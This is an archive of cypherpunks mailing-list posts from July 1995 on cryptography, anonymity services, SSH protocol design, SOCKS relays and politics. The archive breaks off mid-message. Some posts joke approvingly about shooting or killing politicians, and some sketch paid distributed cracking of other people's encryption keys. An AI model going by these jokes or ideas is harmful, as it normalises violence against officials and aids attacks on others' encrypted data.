Worcester Polytechnic Institute, class of 1997.                 dan@milliways.org
******************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Anderson <ericande@linknet.kitsap.lib.wa.us>
Date: Sat, 22 Jul 95 12:22:24 PDT
To: cypherpunks@toad.com
Subject: write some code
Message-ID: <Pine.SUN.3.91.950722121241.25268A-100000@linknet.kitsap.lib.wa.us>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to revive such an old and tired thread, however I found the idea 
quite inspiring and went out and bought a C programming primer that comes W/
a complete tutorial and Borland's turbo C++ Lite compiler.
You people have had a *VERY* profound impact on me and that is what set 
me on this course. I have just written my first program; the mandatory
"Hello world" bit.
Can someone point me in the direction of a mailing list about C programming?
I have been reading the various comp. newsgroups, but I want to join a 
list on the subj. and make some more friends.
Thanks,
Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jason Burrell" <jburrell@crl.com>
Date: Sat, 22 Jul 95 10:28:13 PDT
To: cypherpunks@toad.com
Subject: Re: Something occured to me
Message-ID: <199507221725.NAA18382@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> 
> On Fri, 21 Jul 1995, Robert A. Hayden wrote:
> 
> > Whent he republicans took over the congress, they instidtued that 
> > Contract on America.   One of the first laws that was passed (by both 
> > parties, I might add) was a law that made lawmakers abide by the same 
> > laws that "normal" people abide by.
> 
> If you believe that...
> 
> Well, it is true, under certain limited circumstances, but it doesn't 
> make them criminally liable for writing bad laws, nor can it.

The pity, of course, is that we can't get Exon for passing around a book
that he said contained child pornography, since he's immune while he's on
the Senate floor.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMBE0fyoZzwIn1bdtAQGWwAF/b66+ddWoQ+k7lqOvRu5/2uZgCop5X+d4
ipMc98PXCucBiM5QHP5l6sIopZUVcr5H
=grqV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sat, 22 Jul 95 04:39:26 PDT
To: cypherpunks@toad.com
Subject: Re: Something occured to me
Message-ID: <v01510103ac35c703d666@[193.74.217.2]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>
>Whent he republicans took over the congress, they instidtued that
>Contract on America.   One of the first laws that was passed (by both
>parties, I might add) was a law that made lawmakers abide by the same
>laws that "normal" people abide by.
>
I think this was aimed at congress's tendency to exempt themselves from
their own legislation.  For example, Congressmen are, supposedly, entitled
to practice hiring discrimination based on, "race, creed, or color of socks"

in the words of GB Trudeau's Lacey Davenport.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBAYFY4k1+54BopBAQHxuwP+J/ypbLg07RE49Mvc/oXTl9RtPwTInEv7
t2RjOb57I2gvjr60i/OS/1EFVQv8FE7iZHtXpOEw7W2nHRTOBsWwTx6L9b7NB5Z9
ufkierYXyJnTJvXXvkrevXZ4wmc26Q5dyMU35HmMensRJSYwlR213DyvvKD5aOG1
6MtCqMomJZQ=
=Wn55
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 22 Jul 95 14:28:31 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: CALLER ID AVOIDANCE
Message-ID: <Pine.SUN.3.91.950722142036.20705B-100000@crl4.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

While reading the July issue of Soldier of Fortune, I ran across
an ad for yet another telephone anonymity service.  It reads:

			CALL 1-900-CUT TRAX

	Secure your most sensitive calls from all forms of
	caller I.D. and return-call technologies?

	Now make calls from your own telephone safely and
	anonymously.  No need to find a public phone to
	be discreet.

	Trackers never see your number...only ours!  And
	their number will not appear on your phone bill.

	Call any number in the continental US...

	Just $3.95 a minute for safe secure conversations!

	Call 1-900-CUT-TRAX (1-900-288-8729)
	Beacon Telesystems 914-423-3329

Not necessarily as secure as they would have you believe, but
it does demonstrate there is a market for anonymity, I guess.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sat, 22 Jul 95 15:11:03 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Netscape the Big Win
Message-ID: <199507222210.PAA25441@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:12 PM 7/20/95 -0400, Patrick J. LoPresti wrote:
> When it becomes feasible to do what you are asking for Netscape, I am
> sure that someone will do it.  At the moment, it is largely out of our
> hands, since the Netscape interface is totally controlled by Netscape
> Communications...

Netscape for windows, and I presume for Windows NT, supports DDE
and OLE
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Sat, 22 Jul 95 13:53:13 PDT
To: owner-cypherpunks@toad.com
Subject: Re:  Three strikes you're out!  for politicians... yeah we wish!
Message-ID: <9507222052.AA28172@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


Better yet do it the way Comedy Central wanted to:
	Three strikes your out and term limits.  You can run for re-election
	but if you lose you get shot.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Ben" <samman@CS.YALE.EDU>
Date: Sat, 22 Jul 95 14:01:02 PDT
To: Den of CryptoAnarchists <cypherpunks@toad.com>
Subject: Under Siege II
Message-ID: <Pine.SUN.3.91.950722165444.3785C-100000@frog.zoo2.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


Saw Under Siege II last nite--fairly bad movie--wouldn't recommend it, 
but there was some cpunks/crypto relevance.

*	Mentioned the No Such Agency's SIGINT capabilities via COMMSAT

*	Mentioned encryption several times:
	+	WRT to cell phones
	+	WRT to Newton and encryping files
	+	WRT to codes--used a CD-ROM to store a keyspace and 
		encrypt and compare

Encryption is going mainstream folks.

Ben.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 22 Jul 95 17:06:44 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: HOUDINI ON CRYPTO
Message-ID: <Pine.SUN.3.91.950722165907.5294B-100000@crl12.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

I ran across an old book I bought when I was an adolescent.  Like
most boys (I don't know about girls) I went through a phase when
I was interested in magic.  The name of the book was "Houdini on
Magic."

In it, there is a section about Houdini's fascination with
cryptography.  He talks about relatively primative substitution
ciphers and the like.  One example, though, I thought might be of
interest to Cypherpunks.  He said the following inscription was
written over the Decalogue in a country church.  Apparently, no
one was able to read it for over 200 years.  Can you?:

		PRSRVYPRFCTMNVRKPTHSPRCPTSTN


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bluebird@alpha.c2.org
Date: Sat, 22 Jul 95 17:44:00 PDT
To: cypherpunks@toad.com
Subject: Mixmaster for DOS Yet?
Message-ID: <199507230016.RAA03110@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


[Please reply via netmail or Cc: - I have only periodic access to list.]

Is the Mixmaster user software for DOS platforms completed yet?

Thanks for any help.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mazieres <mazieres@pa.dec.com>
Date: Sat, 22 Jul 95 17:30:45 PDT
To: cypherpunks@toad.com
Subject: Re: Ssh "security hole": proposed fix
Message-ID: <9507230027.AA10524@venus.pa.dec.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, a while ago I suggested the following as simplified (and
therefore easier to find bugs in) ssh protocol:

> PREAMBLE:
> 
> (1)  A -> B: A
> (2)  B -> A: Cb, PKsb, PKb
> (3)  A -> B: {Kab}_PKsb, {A, B, Cb}_Kab
> (4)  B -> A: {{A, B, Cb, Kab, PKsb}_SKb}_Kab
> 
> SSH_AUTH_RHOSTS:
> 
> (5)  A -> B:  0
> 
> SSH_AUTH_RHOSTS_RSA:
> SSH_AUTH_RSA:
> 
> (5)  A -> B: {{A, B, Cb, Kab}_SKa, PKa}_Kab
> 
> SSH_AUTH_PASSWORD:
> 
> (5)  A -> B: {Ka}_Kab

I was assuming that you would basically have to tolerate
man-in-the-middle style attacks if A did not know PKb before the
exchange.  However, I have since realized that it is easy to have
one's public key in an NFS mounted home directory when talking to a
host one has never talked to before.  Thus, B can know PKa even if A
does not know PKb.  This is enough to prevent man in the middle
attacks if we modify the protocol slightly:

PREAMBLE:

(1)  A -> B: A
(2)  B -> A: Cb, PKsb, PKb
(3)  A -> B: {Kab}_PKsb, {A, B, Cb}_Kab
(4)  B -> A: {{A, B, Cb, Kab, PKsb}_SKb}_Kab

SSH_AUTH_RHOSTS:
SSH_AUTH_PASSWORD:

(5)  A -> B:  0

SSH_AUTH_RHOSTS_RSA:
SSH_AUTH_RSA:

(5)  A -> B: {{A, B, Cb, Kab, PKsb}_SKa, PKa}_Kab
                              ^^^^
IF AUTHENTICATION NOT SUFFICIENT:

(6)  B -> A: {"Passwd:"}_Kab
(7)  A -> B: {Ka}_Kab                           ; Ka is A's password

David




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bolivar Shagnasty <tj@compassnet.com>
Date: Sat, 22 Jul 95 16:23:42 PDT
To: cypherpunks@toad.com
Subject: RE: Doling out keyspace (was Re: There is no True Key)
Message-ID: <Chameleon.4.01.2.950722182221.tj@tjunker.compassnet.com>
MIME-Version: 1.0
Content-Type: text/plain


> > - Each helper requests N bits of keyspace.
> > - That chunk is doled out "randomly" by the server.

>Is there any reason why the server should have to dole out the in the
>first place? If a reasonable seed is available, there's no reason each
>helper couldn't just generate a random starting key on its own (with a
>uniform distribution). 

The owner of the key being cracked jumps in and "randomly" selects the part 
of the keyspace containing the key, then reports back in the negative.

This defense of the key is reduced if the server doles out pieces of the 
keyspace randomly, selected only for size, and further reduced if the same 
space is given out multiple times to different requestors. 

Bolivar






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rfreeman@netaxs.com (Richard Freeman)
Date: Sat, 22 Jul 95 15:54:31 PDT
To: cypherpunks@toad.com
Subject: Re: The OS wars and DOOM...
Message-ID: <199507222254.SAA26768@access.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain



>Given that games usually program close to the hardware, and are 
>therefore the _most_ difficult things to port from one environment
>to another, it really makes one wonder why Excel isn't out for
>(for example) Linux or BSD today.
>

I can think of one good reason for starters:  Microsoft makes Excel.  
Microsoft makes Windoze.  Windoze runs on IBM's and Linux runs X-Windows on 
IBM's.  Microsoft doesn't make Linux which already has a tremendous 
advantage in cost and capability.  Now how many people would pay to upgrade 
to Windoze 95 if there were a true multitasking OS which was free and more 
efficient and capable of operating on more limited systems and with as 
strong a software base?  If I could get Microsoft Office for Linux, I would 
have switched myself.  Unfortuantely, I don't have the disk space for both 
DOS and Linux, and I need the commercial grade word-processors, etc...  
There isn't all that much that needs to be added to an OS like Linux to make 
it easy for the general public (perhaps a set of default settings that don't 
require much fiddling by a unix wizard).  Finally, once Microsoft promotes a 
unix-based OS by making software for it, people will start realizing how 
much free stuff there already is for unix, and they will stop buying all 
those nifty utility packages that they buy for DOS/Windoze.  And lastly, 
heaven forbid, people will have access to a windowed OS with command line 
capability!  Now we couldn't have that now, could we?  :)
-----------------------------------------------------------------
Richard T. Freeman <rfreeman@netaxs.com> - finger for pgp key
3D CB AF BD FF E8 0B 10 4E 09 27 00 8D 27 E1 93 
http://www.netaxs.com/~rfreeman - ftp.netaxs.com/people/rfreeman





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Enzo Michelangeli <enzo@ima.net>
Date: Sat, 22 Jul 95 04:47:59 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Netscape the Big Win
In-Reply-To: <199507211727.KAA06527@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.950722185511.3139A-100000@ima.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 21 Jul 1995, Hal wrote:

> This sounds very good if it already is almost working.  The TCP
> connection which is opened would have to be to a server on the local
> machine, so it would be important that the software support that.  Also,
> the local SOCKS relay would of course not want its winsock calls to be
> intercepted and translated in this way, so there would need to be some
> alternative way to access "vanilla" winsock.  Can you give any
> more information on the NEC work?

I can only quote the original posting to the SOCKS mailing list - I answered 
their call for beta-testers, but I haven't heard back from them, yet:

-------------------------------- 8< ---------------------------------------
>From cornell@syl.dl.nec.comSat Jul 22 18:50:10 1995
Date: Thu, 20 Jul 1995 10:05:47 -0500 (CDT)
From: Cornell Kinderknecht <cornell@syl.dl.nec.com>
To: socks@syl.dl.nec.com
Cc: Cornell Kinderknecht <cornell@syl.dl.nec.com>
Subject: Good news for Windows/Winsock users

New SOCKS application for PC/Windows/Winsock.  Looking for beta
volunteers...

We've developed an MSWindows .DLL (Windows version 3.1) that allows
unmodified TCP-based Winsock applications and TCP/IP stacks to
communicate through a SOCKS4.2 server.  This will hopefully be
available for general release sometime soon.  Currently, I'm looking
for volunteers to do some beta testing.

If interested, willing to provide feedback, and don't mind rebooting
your PC when when it locks up :-), email the following information
about your environment to scbeta-apply@syl.dl.nec.com:

1. Winsock stack type and version (Trumpet, NetManage, etc.).
2. Other network OS/drivers (Netware, IPX, packet drivers, SLIP, etc.).
3. Winsock applications (trumptel, wsftp, netscape, etc.).
4. Your email address.
5. Anything else relevant...

I'll keep the number of beta testers limited and so unfortunately I
might not be able to include everyone who requests.

Oh, BTW, here are some requirements:
1. MS Windows3.1.
2. Installed and operating Winsock TCP/IP stack.
3. Installed and operating SOCKS server (v.4.2).
4. PC running Winsock stack must be able to use DNS to resolve
   names and IP addresses (including its own).

--- Cornell
| Cornell Kinderknecht          Email: cornell@syl.dl.nec.com |
| CSTC                            			      |
| NEC Systems Lab.              Phone: 214-518-3509           |
| Irving, TX (Dallas)             			      |
-------------------------------- 8< ---------------------------------------


[...]
> non-blocking connect as there is in Windows.  Maybe Windows 95 will allow
> a more Unix-style communication model, though.  Should the proxy require
> Windows 95, or will Windows 3 still be in widespread use for another
> year or two?

I'm afraid we'll have to live with async socket calls for a while...

> 
> Also IMO the requirements for the Internet relay are pretty different
> than for the Windows relay.  The Internet relay needs only to be able to
> decrypt/encrypt on the port where the request comes from while sending
> plain data the other way.  It needs a config file so the owner can
> control what kinds of outgoing TCP connections can be done.  The Windows
> one needs to be able to do nested encryption (if chains will be allowed
> eventually), to set up chains, etc.  So for these reasons I am inclined
> to think that the two relays would be separate programs.

Well, a config file would be necessary for the windows one too. For 
example, we could want to socksify only connections to some sites/ports, 
socksify+encrypt some others, and open direct TCP connections to others 
yet, such as servers on the same net (I presume that NEC's DLL will 
attempt to socksify all the connections, so we should de-sockisfy some of 
them intoducing sockd functionality.

> The Windows version would need to decrypt incoming data; you don't want
> that coming in the clear.

Oh yes, I actually meant that it should only be able to issue, and not also
accept, "client hello" requests (as per SSL model).

> 
> I am a little unclear on the certificate situation.  As we saw with the
> PGP key servers before RSAREF PGP existed, RSA put pressure on these
> public sites which they saw as contributing to the use of infringing
> software.  Similarly having a certificate created by infringing software
> might be seen as illegal, even if RSAREF was actually used for the
> handshaking in the protocol.  Server operators are quite vulnerable to
> threatening letters from RSA.

RSA patents (I mean RSA, not RSADSI's) are only valid in USA. If I set up 
a certifying authority, say, here in Hong Kong, using EAY's code written in 
Australia, how could RSADSI complain? Server operators would import 
data created under perfectly legal conditions.

> Another problem with RSAREF is that it does not allow you to exchange a
> session key using RSA encryption in a straightforward manner.  The entry
> points you have legal access to choose a random session key, PK encrypt
> it, send it, and then encrypt the message using that session key with DES
> or 3DES.  However I notice that SSLREF calls undocumented entry points
> like RSAPrivateDecrypt and RSAPublicEncrypt.  I am not sure how they are
> able to do this.  Maybe they got special permission from RSA.  I don't
> know whether the SSLEAY library would be able to do this without such
> special arrangements.

That should be investigated. Is RSAREF's licence only valid for some 
entry points? In any case, I suppose that SSLREF may be used with any 
certificate, unlike Netscape (am I wrong?).

> One other problem is the risk taken by people running the relay servers
> on the net.  These could be used to launder connections by hacker /
> cracker types.  So probably only a limited set of outgoing ports would be
> permitted, say, 80 and 1080 which are the most common http ports.  This
> would restrict the utility of the SOCKS approach for other uses like
> secure telnet, unfortunately.

Well, the same problem exists for illegal uses of the present remailers, 
but hasn't stopped their operators.

Enzo




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Sat, 22 Jul 95 20:30:10 PDT
To: Sandy Sandfort <cypherpunks@toad.com>
Subject: Re: HOUDINI ON CRYPTO
Message-ID: <9507230331.AA27567@accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Sandy Sandfort 

. . . there is a section about Houdini's fascination with
cryptography.  He talks about relatively primative substitution
ciphers and the like.  One example, though, I thought might be of
interest to Cypherpunks.  He said the following inscription was
written over the Decalogue in a country church.  Apparently, no
one was able to read it for over 200 years.  Can you?:

		PRSRVYPRFCTMNVRKPTHSPRCPTSTN
....................................

It looks to be something like this to me:

PRESERVE YE PERFECT MEN ?VR? KEEP THIS PERCEPT (or PRECEPT) SATAN


  ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Sat, 22 Jul 95 11:51:27 PDT
To: cypherpunks@toad.com
Subject: Re: big word listing
Message-ID: <v01510100ac36cb54a1d2@[193.74.217.4]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


>Post Office Protocol 3 (POP3) has an optional command called
>APOP which sends a string of the form "<process-ID.clock@hostname>".
>The POP3 client calculates the MD5 digest of
>
>  <process-ID.clock@hostname>password
>
>and sends it to the server as "APOP username 58349485whatever89583449".
>
>I like it.
>

Of course, this requires the user password to be stored unencrypted on the
server; which you may not want to do.
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBEbT44k1+54BopBAQEvaAP/btvc6mK8aFL5ONL70aQRhJIY/Zu+6HnU
WSDiVNLTtbEiMA+4W7hOD3RQORl42r/Lqdyevq+VmG1LAikCETDgS77jiGq11Kt+
q1HVGQEkiPexd8asJw66hjYLo+vWylu2U39e7YWc01ccr2Hr+zZR+/MHVPQsMq5y
LXTiercKsow=
=gdHC
-----END PGP SIGNATURE-----

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 22 Jul 95 21:14:11 PDT
To: blancw@accessone.com
Subject: Re: HOUDINI ON CRYPTO
In-Reply-To: <9507230331.AA27567@accessone.com>
Message-ID: <Pine.SUN.3.91.950722211102.12499B-100000@crl6.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Blanc wrote:

>> 		PRSRVYPRFCTMNVRKPTHSPRCPTSTN
> ....................................
> 
> It looks to be something like this to me:
> 
> PRESERVE YE PERFECT MEN ?VR? KEEP THIS PERCEPT (or PRECEPT) SATAN

Close, very close.  


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol Sysadmin]" <erc@khijol.intele.net>
Date: Sat, 22 Jul 95 20:45:59 PDT
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Re: Three strikes you're out! for politicians... yeah we wish!
In-Reply-To: <v02130504ac375fb78fb1@[166.84.254.3]>
Message-ID: <Pine.3.89.9507222116.A338-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 22 Jul 1995, Robert A. Rosenberg wrote:

> At 04:00 7/22/95, Craig Hubley wrote:
> >>
> >> About two weeks ago, there was some talk in here with regards to holding
> >> DC lawmakers crominally liable for passign bad laws.  This was followed
> >> up with postins pointing out that you can't do that.
> >
> >Here's something you *can* do:
> >
> >"Three strikes you're out" for politicians.
> >
> >Any time the Supreme Court strikes down a law, any politician who has been
> >found to have voted in favor of three such laws is immediately stripped of
> >all offices and rendered ineligible to run for public office ever again,
> >at any level.  (The same might apply to those found to have lied to a court
> >
> >A politician who would trade citizen rights for political gain must be denied
> >the benefits of such a tradeoff.  This might prevent the rise of demagogues.
> >Term limits, etc., would of course help as well.  It would also give those
> >politicians who vote for 'motherhood' issues like 'protecting kids from the
> >perverts on the Internet' a good reason to think twice about the real issue.
> >If they REALLY believe they are protecting someone, they will still vote in
> >favor.  If they are going with the flow to avoid criticism, they'll lose in
> >the end.
> >
> >My reasoning is that any politician whose laws are consistently struck down
> >should be deemed to lack a fundamental understanding of the rights of the
> >citizens of his/her country or jurisdiction.  They are thus a poor guardian
> >of those rights.
> >
> >You heard it here first.
> >
> >Craig Hubley
> 
> 
> I'd love to see the system described in H. Beam Piper's "A Planet for
> Texans" implemented. Under that system, all Politicians are BY LAW
> representing the interests of ALL their constituents. Any constituent who
> feels that he/she is not being adequately represented (or feels that
> his/her views/interests are being misrepresented) is by law granted total
> access to the Politician and may register this disapproval of the
> Politician's Performance in any way up to and including killing the
> Politician. If the Politician (or his/her survivors/friends <g>) feel that
> the constituent used excessive force (such as using a car bomb or a long
> distance weapon like a rifle as opposed to using a personal weapon such as
> a hand gun at close range) or force out-of-proportion to the action being
> protested, they can bring charges in the "Court of Political Justice". In
> such a trial it is the job of the prosecution (ie: The Politician or
> Representatives) to prove that the constituent did, in fact, overstep the
> accepted rules for registering disapproval.

Reminds me of the old Heinlein advice about supplying forceful 
punctuation after the word "but" in: "Of course, it's none of my 
business, but...".  RAH advises against using excessive force - cutting 
the offender's throat is only a momentary pleasure and is bound to get 
you talked about ;)
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Checkered Daemon <cdaemon@goblin.punk.net>
Date: Sat, 22 Jul 95 22:08:40 PDT
To: cypherpunks@toad.com
Subject: Remailers & local newsgroups
Message-ID: <199507230506.WAA07551@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


Do any of the posting remailers accept the inclusion of regional usenets
in their active files so that people can use them to post directly to 
regional newsgroups?
-- 
The Checkered Daemon			       	  cdaemon@goblin.punk.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alan.pugh@internetmci.com (Alan Pugh)
Date: Sat, 22 Jul 95 19:45:35 PDT
To: cypherpunks@toad.com
Subject: Re: Java (was Netscape: the big win)
Message-ID: <01HT6RA4SJ3A938ROQ@MAILSRV1.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> There are many crypto-anarchy applications as well:

> Key cracking.  If you can write a key-cracker and keyspace fetcher in
> Java,  then people can join key cracking efforts as easily looking up
> an URL.  It  may not be nearly as efficient as the highly optimized C
> versions used in the  current RC4-40 efforts, but there's going to be
> millions of potential workers  this way.  If you were charging money
> to break keys (or you were looking for  keys that are very valuable
> to you), you could set up the worker client to  accept e-cash for in
> return for searching keyspace "Click here to earn money  while you
> aren't using your machine..."   Ensuring that workers are actually
> searching the keyspace and other implementation details is left as an
> exercise for the reader.
>
> e-instrument or information exchanges, with Java interfaces for bidding,
> buying, selling, etc...

i think i prefer the idea mentioned previously on the list where it
works pretty much like a lottery. you could operate it in one of two
ways. if the encrypted data was particularly valuable to its owner
and was willing to put up a reward for the key, there would be an
incentive for people to spend idle time running through keyspace.

if it was structured as a reward, no money need be paid until the key
is found.

it could also be set up more like a traditional lottery where you
'buy' x amont of keyspace and if you hit it, all e-cash collected
would go to you. there would be many problems with running this.
nothing could keep someone from just running keys on their own in the
hope of hitting it, then buy the keyspace that contains it if he got
a hit. if the keyspace were allocated sequentially, and the person
looking for the key only paid to the person who initially 'purchased'
the keyspace, the person who got it could advertise for the person
who got the space, although this would be problematic.

if someone really wanted to do this, it would be _much_ easier to
just run the operation similar to what was performed here in
cypherpunks recently with the person who first reports the hit
getting a reward of some amount, less a modest amount for the
person/group coordinating the effort.


amp
<0003701548@mcimail.com>
<alan.pugh@internetmci.com>
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D
July 22, 1995   14:35



if someone wants a key and is willing to pay someone


DataHavens, which would probably require complex (internally) software to use.

I'm sure the online casino people are salivating over the prospects too...

Basically any fancy crypto application that requires a custom client to
operate...  Since its platform independent, efforts will be put to better use
as well.


andrew

-----BEGIN PGP SIGNATURE-----
Version: 2.61

iQEVAwUBMBEazygP1O9KJoPBAQGHFwgAiO2ha7BFw04Fu3RNuk9FLFaZNrUYrFjR
5VBNkWeE3JOol7xSfrd7V8IzE2UyrVEwa4eyx5jHrPVQYxC9UTHzUW5nG3/vMefD
gtCsQQcz5hL3Qbv6Cn2dqkTkWGbL7y/MxmblBm0u8vdX6/LPjAVTfucNrN9KxDY/
NXDM3tr9FclAWch6VKiXvjMeoognXNtpFfI76ReZzimJ4Yyoy9naGQ8BLdPiU1Xb
mZIuFnVQWJe56YlBBgXo1aLsAcg48oWYCSMQXPRiQ/Bd6kL/Q6KHv34IbV8WVYib
9XjJd84JU+he5LDOIn9SO7gLXkRuBiiRsOalX89jjwAvFZwQuLMpGQ==
=rqot
-----END PGP SIGNATURE-----
          *********************************************
          *          / Only God can see the whole     *
          *  O[%\%\%{<>===========================-   *
          *          \ Mandlebrot Set at Once!        *
          * amp                                       *
          * <0003701548@mcimail.com>                  *
          * <alan.pugh@internetmci.com>               *
          *********************************************
Key fingerprint =  A7 97 70 0F E2 5B 95 7C  DB 7C 2B BF 0F E1 69 1D






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Sat, 22 Jul 95 22:41:57 PDT
To: pgf@tyrell.net (Phil Fraering)
Subject: Re: The end of public key cryptography as we know it?
In-Reply-To: <199507132009.AA15283@tyrell.net>
Message-ID: <9507230539.AA18257@doom.intuit.com>
MIME-Version: 1.0
Content-Type: text/plain


Phil,

>    An article posted on sci.crypt stated that quantum factoring
>    is real and that an article was posted in this month's Science
>    magazine. The author of the post says this would make factoring
>    a 10 bit number the same time as factoring a 100000000 bit number.
> 
> You can bet your ass and your mother's and grandmother's donatable
> organs that if this were possible, then the legislative initiatives
> currently underway would not be: they'd just let us use RSA and get
> a false sense of security.
> 
>    A wonder how long it is before every major government in the world
>    has one of these. Makes RSA's future kind of moot doesn't it??
> 
> Well, it would probably "prove" many-worlds right: in which case
> we're probably going to be invaded from the one where the Nazis
> won WWII, or the libertarians won Shay's Rebellion.

Yuk yuk. :>

A minor adjustment to your comment: I haven't read the work yet, but
if it's based on Shor and Simon, it only "proves" the existence of
state superpositions (and perhaps some other mathematical things
relating to the construction of unitary transforms) - a fact equally
congenial to Many Worlds, Copenhagen, von Neumann, and most other
interpretations of quantum mechanics.  The only people who would
likely be upset by this are the neo-materialists and other
hidden-variable fetishists.

I'm six hundred messages behind and not likely to catch up soon, so
apologies if this has already been covered.

   - Mark -

--
Mark Chen 
chen@intuit.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C  CF 95 A5 B0 6E E0 1E 1D



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sat, 22 Jul 95 19:57:00 PDT
To: cypherpunks@toad.com
Subject: Re: Something occured to me
Message-ID: <199507230254.WAA21641@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199507221725.NAA18382@bb.hks.net>, jburrell@crl.com ("Jason
Burrell") wrote:

